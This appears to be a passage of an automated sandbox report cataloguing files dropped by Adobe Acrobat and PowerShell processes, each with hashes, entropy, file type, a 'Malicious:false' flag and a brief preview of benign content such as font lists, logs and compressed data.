                                                            Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                            File Type:PostScript document text
                                                            Category:dropped
                                                            Size (bytes):10880
                                                            Entropy (8bit):5.214360287289079
                                                            Encrypted:false
                                                            SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                            MD5:B60EE534029885BD6DECA42D1263BDC0
                                                            SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                            SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                            SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                            Malicious:false
                                                            Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                            File Type:PostScript document text
                                                            Category:dropped
                                                            Size (bytes):10880
                                                            Entropy (8bit):5.214360287289079
                                                            Encrypted:false
                                                            SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                            MD5:B60EE534029885BD6DECA42D1263BDC0
                                                            SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                            SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                            SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                            Malicious:false
                                                            Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):4
                                                            Entropy (8bit):0.8112781244591328
                                                            Encrypted:false
                                                            SSDEEP:3:e:e
                                                            MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                            SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                            SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                            SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                            Malicious:false
                                                            Preview:....
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                            File Type:JSON data
                                                            Category:dropped
                                                            Size (bytes):2145
                                                            Entropy (8bit):5.071787986230253
                                                            Encrypted:false
                                                            SSDEEP:48:YsXXaUOAYLTe37hilbinCICj460nbawdPT98a7:n60SunCIY46qp58o
                                                            MD5:15A7231B8B4D95FBCA1B030DAC114BE9
                                                            SHA1:63F542FD06A77AA83D6C39FFFFD23EE000C02ED7
                                                            SHA-256:67FC37AB8ED18AAAF8841B6848B5B3BE3750D1799533C1056BF0515EF940FA5C
                                                            SHA-512:0E8FFA036CE5DB973220FE34D03D2C62F9B7374B80FBC3E5A44A9AADB774F359273D543800DA25A2D5BA33A323EF0F46B6C19B92DE66BB26F1CBA39C665897DD
                                                            Malicious:false
                                                            Preview:{"all":[{"id":"TESTING","info":{"dg":"DG","sid":"TESTING"},"mimeType":"file","size":4,"ts":1733496786000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"07c63119417f700c18d92edf3f79d790","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1696501843000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"d487203459a12b3808bd4198c8ea945e","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696501843000},{"id":"DC_FirstMile_Right_Sec_Surface","info":{"dg":"8cb00af458b1bdce0dda3ae2e7bb4e0d","sid":"DC_FirstMile_Right_Sec_Surface"},"mimeType":"file","size":294,"ts":1696501837000},{"id":"DC_Reader_RHP_Banner","info":{"dg":"a50f600a3876e29b46e72f860f9824b0","sid":"DC_Reader_RHP_Banner"},"mimeType":"file","size":1395,"ts":1696499443000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"19cba2a528c79b7972b63d98e305eda1","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696499443000},{"id":"Edit_InApp_Aug2020","info":{"dg":"2b9a96ea
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                            Category:dropped
                                                            Size (bytes):12288
                                                            Entropy (8bit):1.321169138197915
                                                            Encrypted:false
                                                            SSDEEP:24:TLKufx/XYKQvGJF7urs9O3KaiZ3FL63FLesb+sZobF16R6FdpqpQ6Y3O+EXSqXl1:TGufl2GL7msUKB0M0+Tb608Y3XrPW
                                                            MD5:4BC78EFEB8EC60ACDB2D5DE128CAA07B
                                                            SHA1:1BAA8DA4318068417B2405AE6BF0320A9BA3CA83
                                                            SHA-256:7B4005FF128B79F52950B2F7C230AF02973EB4C05776B9E58F22670A452566AC
                                                            SHA-512:11622751C43C3E2DDE318E68383411266BDCF7AFF1C566C7987C40617B111D4B911CC28733B8CFC7CE6D281EF3517C144B47458465B42AD2E88A27A9E33AE862
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                            File Type:SQLite Rollback Journal
                                                            Category:dropped
                                                            Size (bytes):8720
                                                            Entropy (8bit):1.7824434499655948
                                                            Encrypted:false
                                                            SSDEEP:24:7+ttwl3KaiZ3FL63FLesb+sZobF16R6FdpqpQ6Y3O/EXSqXlyGKaitqLhx/XYKQn:7MsKB0M0+Tb608Y3GrGKxqFl2GL7msM
                                                            MD5:52FB559F8209EC1907FF059E7E77ABAD
                                                            SHA1:24F12C2978DD9C169C80E68733689A09268B75F2
                                                            SHA-256:8A9BFC0EFD54ADDBCB520BCF8A005F4024C57F97391E3516A88630DF33CB3D8F
                                                            SHA-512:4E0CBB5D2BCB8CD8988761641C9A88232D97C936FB702AFCA06F54400234BA758634595ED2F406558BEFF3C8E5E7097832F528C0172F2CAEE0D3B7BB9747D231
                                                            Malicious:false
                                                            Preview:.... .c........!..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^.p.p.p.p.p.p.p.p.p.p..........................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):66726
                                                            Entropy (8bit):5.392739213842091
                                                            Encrypted:false
                                                            SSDEEP:768:RNOpblrU6TBH44ADKZEgWz65W4Pc6FOaoS7O5dYKCbACCOVYyu:6a6TZ44ADEWz4c6FOaoa8yVK
                                                            MD5:36133164BAB9E9DAB96EB54BC2B08CDF
                                                            SHA1:81E431B66257F218E2D207F17F48AE7A83B17F19
                                                            SHA-256:26D38D68D1AB94AA7B2CBC3D7F067537AFA2DABC7B95A10E6E3377CA39457298
                                                            SHA-512:F61B69DEA6A9A7A3470AD45EDD5A7A2A357506FC9BD672AEDB7BF16C4A0E0D818876066A711B36BDB7AEB504A292F9FCD06FD4E17528CC749E77E06E07B3F299
                                                            Malicious:false
                                                            Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):0.34726597513537405
                                                            Encrypted:false
                                                            SSDEEP:3:Nlll:Nll
                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                            Malicious:false
                                                            Preview:@...e...........................................................
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):246
                                                            Entropy (8bit):3.5390718303530573
                                                            Encrypted:false
                                                            SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8V6qLm:Qw946cPbiOxDlbYnuRKkbm
                                                            MD5:95F8785FC6BE283D52D2EDF4110CFC9A
                                                            SHA1:86F2E72A4F521EE2F06F3EBE4A0A78870A4869A8
                                                            SHA-256:18EA2CBD09668BD983E8831FE3A3B84BEA702D12DEC0ECFFB2CCE9D7A7280B31
                                                            SHA-512:7CF70E25C32656FB981703B4DDDCE868504CCFF8DDC165582D3D7D073853B31133E5CEF74D0C89662F480F7373F8A75783A1939B722CB248404ECC3DF23454B6
                                                            Malicious:false
                                                            Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.6./.1.2./.2.0.2.4. . .0.9.:.5.3.:.1.4. .=.=.=.....
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                            File Type:ASCII text, with very long lines (393)
                                                            Category:dropped
                                                            Size (bytes):16525
                                                            Entropy (8bit):5.361022727805069
                                                            Encrypted:false
                                                            SSDEEP:384:cBD67lQV4j1MOuD/btX+wknz+fzTqyorqz3tVFr84AbAYpfFWbWt+Fjwn0z5O+Wf:4M5
                                                            MD5:70A2D078BEFD5E910EE035832171B399
                                                            SHA1:1AB91914ECD7852E512C73437D30013594A16FB0
                                                            SHA-256:2B55DE84E5446FD295128DAD5827122E98AC784F96A1F422B711B14E8F7DB1ED
                                                            SHA-512:9FF36D4E320A8791AB0B87F24CAB4CBE777D9E8A3A64D26AF419132CDFDFCCD9A253EE9854032C4C87C546187951077F869CBCBDC9513278C557FC4895C7DBBC
                                                            Malicious:false
                                                            Preview:SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:158+0200 ThreadID=4884 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:159+0200 ThreadID=4884 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:159+0200 ThreadID=4884 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:159+0200 ThreadID=4884 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:159+0200 ThreadID=4884 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                            File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):15114
                                                            Entropy (8bit):5.3692664876517435
                                                            Encrypted:false
                                                            SSDEEP:384:BWdHBHIH5A9A8AuIAoA3AHAeAAA9hljh9jmjwjmj4tQB1gVg2g5gGOUxUZUjSF94:BmhoZojjIbG0rhATjPykqUin65guY4eP
                                                            MD5:5DF3AB20D4BC5625DA58EE1AF69B3BED
                                                            SHA1:AED241E2F3D88AD7161D9E36C4A23682F9246E6D
                                                            SHA-256:FC265157E3C4BC621629EE10CE6A6864585C3F89C8A16B1E9BDA97F763D03482
                                                            SHA-512:C8781B3AF42473CC0A5752F4E12DCF2469320545EC33EF3B18B223C2386127935E39B791DE84CFD4F43005F563C9932C7B38B321481DE8BA5E087F6478BE0C54
                                                            Malicious:false
                                                            Preview:SessionID=78135a7e-ce9a-4150-b393-4fcdb397b219.1733496785550 Timestamp=2024-12-06T09:53:05:550-0500 ThreadID=8416 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=78135a7e-ce9a-4150-b393-4fcdb397b219.1733496785550 Timestamp=2024-12-06T09:53:05:551-0500 ThreadID=8416 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=78135a7e-ce9a-4150-b393-4fcdb397b219.1733496785550 Timestamp=2024-12-06T09:53:05:551-0500 ThreadID=8416 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=78135a7e-ce9a-4150-b393-4fcdb397b219.1733496785550 Timestamp=2024-12-06T09:53:05:551-0500 ThreadID=8416 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=78135a7e-ce9a-4150-b393-4fcdb397b219.1733496785550 Timestamp=2024-12-06T09:53:05:552-0500 ThreadID=8416 Component=ngl-lib_NglAppLib Description="SetConf
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):29752
                                                            Entropy (8bit):5.412324943833884
                                                            Encrypted:false
                                                            SSDEEP:192:zcbaIGkcbIcbiIICcbBOQQ0fQNCHPaPOhWPOA3mbSAcbsGC9GZPOdIzZMJzV3ZmP:EGvIcNYdXtS
                                                            MD5:669892E3C32B53E0DFB163235B07867B
                                                            SHA1:791FCD4E644F0EB616A943869D5554CFC208D7F9
                                                            SHA-256:49012EB2AFF473ECAB20A76F62A94E62AEC07A24FCBB957449215BF1AB77E761
                                                            SHA-512:032F3849A2589D41FF2F7CEA2AED57C5911AC36ED6B262EAEED4AA81BD503B7794C40A36B27C268C70398F62EE507E84C341486799ED819D909F0EB08E2C27D7
                                                            Malicious:false
                                                            Preview:05-10-2023 11:50:33:.---2---..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 11:50:33:.Closing File..05-10-
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                            Category:dropped
                                                            Size (bytes):758601
                                                            Entropy (8bit):7.98639316555857
                                                            Encrypted:false
                                                            SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                            MD5:3A49135134665364308390AC398006F1
                                                            SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                            SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                            SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                            Malicious:false
                                                            Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                            Category:dropped
                                                            Size (bytes):1407294
                                                            Entropy (8bit):7.97605879016224
                                                            Encrypted:false
                                                            SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                            MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                            SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                            SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                            SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                            Malicious:false
                                                            Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                            Category:dropped
                                                            Size (bytes):1419751
                                                            Entropy (8bit):7.976496077007677
                                                            Encrypted:false
                                                            SSDEEP:24576:/VRaWL07oMYIGNPHGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:tRaWLxMZGBGZn3mlind9i4ufFXpAXkru
                                                            MD5:88DBC4FAE46D0D16E3CF736C68612A35
                                                            SHA1:17789925B3BBF8336D28BCFD698E6C0520A8A6C7
                                                            SHA-256:0CAE3C61EB418C13ABB16D8DB85C7B7199AF31768750F5EA05FFD3868DAAA030
                                                            SHA-512:67C286755521835FB72773EDCE1514FD65DB28A4E1856B7B53CE2383EA50C9125FF507484964803BA9B0BE83D7E86C8DE8E17D837AB42ECA713E607C17875D81
                                                            Malicious:false
